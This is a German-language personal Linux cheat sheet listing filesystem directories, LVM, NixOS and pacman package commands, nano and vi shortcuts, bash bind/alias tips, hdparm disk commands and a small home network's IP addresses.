/proc		Pseudodateisystem
/root		Homeverzeichnis von Root
/run		Daten laufender Prozesse
/snap		Dateien von Snap-Paketen
/srv		Services: Daten die von anderen Diensten weitergegeben werden
/sys
/tmp		Temporäres Verzeichnes wird geleert nach dem herunterfahren
/usr		Systemwerkzeuge und Bibliotheken
/var		Variable daten die sich öfters verändern
/var/log		Logfiles

Befehle
pvs	Zeigt Festplatten an
vgs	zeigt Verbund an
lvs	Zeigt auch was an.

nix-shell -p bitwarden	zum installieren von Bitwarden
nix-env --install bitwarden	installiert Bitwarden im System permanent
sudo nixos-rebuild switch --upgrade	Update des Systems
sudo nixos-rebuild switch --rollback	Vorherigen Stand wiederherstellen.

Befehl	Beschreibung
pacman -Syy	Update
pacman -Syu	Upgrade
pacman -S <Paket>	Installiert ein Paket
pacman -R <Paket>	Deinstalliert ein Paket
pacman -U <Paket-Dateiname>	Installation eines Paketes aus einer lokalen Datei (z.B. für ein Downgrade oder zur Installation selbst gebauter Pakete)

Befehl	Beschreibung
pacman -Syu	Führt eine komplette System-Aktualisierung aus
pacman -S <Paket1 Paket2>	Eines oder mehrere Pakete installieren oder aktualisieren
pacman -Sy	Lokale Datenbank aktualisieren
pacman -Su	Alle installierten Pakete aktualisieren
pacman -Syy	Lokale Datenbank komplett neu aufbauen und aktualisieren
pacman -Syuu	Alle installierten Pakete downgraden (von Testing nach Core/Extra)
pacman -S testing/<Paket>	Paket aus einem spezifischen Repo (hier: testing) installieren
pacman -Sw <Paket>	Paket herunterladen, ohne es zu installieren

Befehl	Beschreibung
pacman -Ss <Paket>	Sucht nach installierbaren Paketen. Es reicht ein Teil des Paketnamens oder der Paketbeschreibung
pacman -Sg	Sucht nach installierbaren Paketgruppen
pacman -Sg <Paketgruppe>	Zeigt den Inhalt einer Paketgruppe
pacman -Si <Paket>	Informationen zu (noch) nicht installierten Paketen anzeigen

Befehl	Beschreibung
pacman -R <Paketname>	Deinstallation eines oder mehrerer Pakete (aus AUR oder Repos)
pacman -Rs <Paketname>	Wie oben, zusätzlich werden alle abhängige Pakete gesucht und mit entfernt, falls diese nicht von einer anderen Anwendung gebraucht werden
pacman -Rsc <Paketname>	Wie oben. Abhängigkeiten werden kaskadierend entfernt
pacman -Rscn <Paketname>	Wie oben. Die Konfigurationsdateien der Anwendung werden mit entfernt
pacman -Rdd <Paket>	Deinstallation eines Paketes ohne Prüfung bestehender Paketabhängigkeiten. Vorsicht, hierdurch kann die Konsistenz und Funktionstüchtigkeit der Systeminstallation beeinträchtigt werden!
pacman -Rss <Paket>	Paket mit allen benötigten Abhängigkeiten und deren Abhängigkeiten entfernen

Befehl	Beschreibung
pacman -Q	Zeigt alle installierten Pakete inklusive Versionsnummer auf dem System an
pacman -Qi <Paket>	Informationen zu bereits installiertem Paket anzeigen
pacman -Qs <Suchmuster>	Installierte Pakete nach Name oder einem Begriff in der Beschreibung durchsuchen.
pacman -Qdt	Verwaiste Pakete anzeigen, die als Abhängigkeiten installiert wurden, aber nicht mehr von anderen Paketen benötigt werden
pacman -Qet	Pakete anzeigen, die ausdrücklich installiert wurden, aber nicht von anderen als Abhängigkeit benötigt werden
pacman -Ql <Paket>	Zeigt alle installierten Dateien des Pakets im System
pacman -Qm	Pakete anzeigen, die sich in keinem aktivierten Repo laut /etc/pacman.conf befinden
pacman -Qo <Pfad zur Datei>	Zeigt das Paket an, welches die gesuchte Datei enthält
pacman -Sy && pacman -Qu	Aktualisiert die lokale Paketdatenbank und zeigt verfügbare Updates an
pacman -Qk \| grep warning	Überprüft alle Pakete auf fehlende Dateien und schränkt die Ausgabe auf Problempakete ein

Befehl	Beschreibung
pacman -Fy	Lokale Datenbank aktualisieren (wie -Sy)
pacman -Fyy	Lokale Datenbank neu aufbauen und aktualisieren (wie -Syy)
pacman -F <Datei>	Paket suchen das die Datei enthält
pacman -Fx <Regex>	Wie -F, aber Suche mit regulären Ausdrücken (hilfreich, falls der vollständige Dateiname unbekannt ist)
pacman -Fl <Paket>	Alle Dateien des Paketes anzeigen

Pfad	Bezeichnung
/bin	Enthält Programm des Betriebssystems
/home	Nutzerverzeichnisse
/opt	Anwendungen von Drittanwendern (apt…)
/usr	Enhält Anwendungen die vom Admin auf dem System gebaut wurden und Programmbibliotheken
/etc	Enhält anwendungszugehörige Dateien zum Konfigurieren
/var	Enthält häufig veränderte Dateien (Logs/Temp)
/dev	Seht für Devices.
/mnt

Befehl	Beschreibung
Crtl + X	Verlassen
Crtl + 6	Marieren
ALT + 6	Kopieren
Crtl + U	Einfügen
Crtl + K	Ausschneiden
Alt + U	Rückgängig
Alt + E	Wiederholen
Crtl + W	Suchen
Esc + B	Zum umschalten (Toogle)
Crtl + \\	Suchen + Ersetzen
Crtl + G	Hilfe
Crtl + R	Weitere Datei öffnen (vorher mit Esc - F) Dann würd eine neue Datei geöffnet. Mit Crtl + T Browser öffnen
Alt + < oder >	Zwischen den geöffneten Dateien wechseln
Esc - X	Hilfe ein und ausschalten
Esc - C	Zeilennummer anschauen lassen
Esc - P	Kontrollmarker anzeigen lassen
Esc - O	Stellt den Tabulator um
Esc - Y	Syntaxhighlighting
Crtl + T	Ausführen

Befehl		Kommentar
`vi`	`vi file1.md`	Startet den vi Editor (sofern installiert)
`i`		startet den Insert Mode
`esc`		Insertmode wird beendet
`:wq`		Datei schreiben und beenden

Befehl	Beschreibung
bind	Tastenbelegung im Terminal. Beispiel `bind '"\C_L":kill-whole-line' "\\C" = Strg, "\\e" = Alt, "\\n" = Enter` `Bind-Befehle können Sie interaktiv ausprobieren. Sie gelten bis zum Schließen des Terminals. Für permanente Gültigkeit benötigen Sie einen Eintrag in der „\~/.bashrc“.`
	Dauerhaftes einbinden `~/.bash_aliases` bearbeiten \| Befehle und tastenkombinatinen hinterlegen \| `alias checkupdates='sudo apt-get update && sudo apt-get upgrade -y'`
file	Beschreibung: ermittelt den Dateityp und die genauen inhaltlichen Dateieigenschaften
htop	Beschreibung: Taskmanager für den Terminal
Festplatte
hdparm -c /dev/sda	Festplatte überprüfen
hdparm -Y /dev/sda	Festplatte geht in den StandbyModus
ls -la /dev/disk/by-id/	zeigt alle Festplatten mit der ID an.
	nano /etc/hdparm.conf

Fritz.Box	10.1.1.1
Ubuntu Server	10.1.1.160 10.10.1.254
Client	10.10.1.51

Netzwerk	IP-Adresse des dahinterligenden Netzwerkes 10.1.1.0
Subnetzmaske	255.255.255.0
Gateway	Ubuntu Server Adresse 192.168.1.172